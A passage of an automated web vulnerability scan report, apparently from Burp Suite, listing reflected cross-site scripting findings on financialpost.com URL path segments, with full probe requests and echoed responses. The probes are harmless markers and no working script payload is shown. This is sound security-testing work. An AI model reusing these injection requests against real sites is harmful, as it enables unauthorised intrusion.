p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43339


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/company/76a86';18777c60d8e/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=company;kw=76a86';18777c60d8e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=33175995?">
...[SNIP]...

1.126. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/company/news/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72b02'%3ba82f1c7067e was submitted in the REST URL parameter 1. This input was echoed as 72b02';a82f1c7067e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets72b02'%3ba82f1c7067e/company/news/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68964
Expires: Sun, 19 Dec 2010 02:58:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets72b02';a82f1c7067e/company/news/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets72b02';a82f1c7067e;kw=company;kw=news;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=19334656?">
...[SNIP]...

1.127. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/company/news/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53308'%3bd98cf4b6041 was submitted in the REST URL parameter 2. This input was echoed as 53308';d98cf4b6041 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/company53308'%3bd98cf4b6041/news/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70239
Expires: Sun, 19 Dec 2010 02:58:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/company53308';d98cf4b6041/news/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=company53308';d98cf4b6041;kw=news;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68119831?">
...[SNIP]...

1.128. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/company/news/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6f73'%3bc39a440a891 was submitted in the REST URL parameter 3. This input was echoed as f6f73';c39a440a891 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/company/newsf6f73'%3bc39a440a891/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69677
Expires: Sun, 19 Dec 2010 02:58:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/company/newsf6f73';c39a440a891/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=company;kw=newsf6f73';c39a440a891;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=97628114?">
...[SNIP]...

1.129. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/company/news/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ed45'%3be3d4058c973 was submitted in the REST URL parameter 4. This input was echoed as 8ed45';e3d4058c973 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/company/news/8ed45'%3be3d4058c973 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:59:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:59:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43481


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/company/news/8ed45';e3d4058c973/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=company;kw=news;kw=8ed45';e3d4058c973;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=62450243?">
...[SNIP]...

1.130. http://www.financialpost.com/markets/currencies/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/currencies/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4081d'%3b37f4d0cacb4 was submitted in the REST URL parameter 1. This input was echoed as 4081d';37f4d0cacb4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets4081d'%3b37f4d0cacb4/currencies/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43392


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets4081d';37f4d0cacb4/currencies/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets4081d';37f4d0cacb4;kw=currencies;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=46209524?">
...[SNIP]...

1.131. http://www.financialpost.com/markets/currencies/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/currencies/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c598b'%3bb34dc10ee96 was submitted in the REST URL parameter 2. This input was echoed as c598b';b34dc10ee96 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/currenciesc598b'%3bb34dc10ee96/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43356


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/currenciesc598b';b34dc10ee96/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=currenciesc598b';b34dc10ee96;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=44005084?">
...[SNIP]...

1.132. http://www.financialpost.com/markets/data/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/data/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52095'%3bb85c90f4c12 was submitted in the REST URL parameter 1. This input was echoed as 52095';b85c90f4c12 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets52095'%3bb85c90f4c12/data/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:08:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43272


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets52095';b85c90f4c12/data/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets52095';b85c90f4c12;kw=data;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=39855799?">
...[SNIP]...

1.133. http://www.financialpost.com/markets/data/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/data/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90bb7'%3b3637543487d was submitted in the REST URL parameter 2. This input was echoed as 90bb7';3637543487d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/data90bb7'%3b3637543487d/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36419


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/data90bb7';3637543487d/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=data90bb7';3637543487d;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=49248833?">
...[SNIP]...

1.134. http://www.financialpost.com/markets/detail/index.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/detail/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 219de'%3bb428df72f46 was submitted in the REST URL parameter 1. This input was echoed as 219de';b428df72f46 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets219de'%3bb428df72f46/detail/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43312


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets219de';b428df72f46/detail/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets219de';b428df72f46;kw=detail;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=57259658?">
...[SNIP]...

1.135. http://www.financialpost.com/markets/detail/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/detail/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b430b'%3b1c037b25630 was submitted in the REST URL parameter 2. This input was echoed as b430b';1c037b25630 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/detailb430b'%3b1c037b25630/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43276


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/detailb430b';1c037b25630/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=detailb430b';1c037b25630;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=23504501?">
...[SNIP]...

1.136. http://www.financialpost.com/markets/detail/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/detail/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 624ac'%3b26384954959 was submitted in the REST URL parameter 3. This input was echoed as 624ac';26384954959 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/detail/624ac'%3b26384954959 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43318


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/detail/624ac';26384954959/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=detail;kw=624ac';26384954959;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=44316867?">
...[SNIP]...

1.137. http://www.financialpost.com/markets/funds/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/funds/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87abb'%3b4fc39ea6f62 was submitted in the REST URL parameter 1. This input was echoed as 87abb';4fc39ea6f62 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets87abb'%3b4fc39ea6f62/funds/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36474


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets87abb';4fc39ea6f62/funds/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets87abb';4fc39ea6f62;kw=funds;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32073054?">
...[SNIP]...

1.138. http://www.financialpost.com/markets/funds/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/funds/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a40f3'%3bb938dde38ac was submitted in the REST URL parameter 2. This input was echoed as a40f3';b938dde38ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/fundsa40f3'%3bb938dde38ac/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43256


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/fundsa40f3';b938dde38ac/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=fundsa40f3';b938dde38ac;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=48027550?">
...[SNIP]...

1.139. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/funds/profile/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5926e'%3b02d83b6f42d was submitted in the REST URL parameter 1. This input was echoed as 5926e';02d83b6f42d in the application's response.

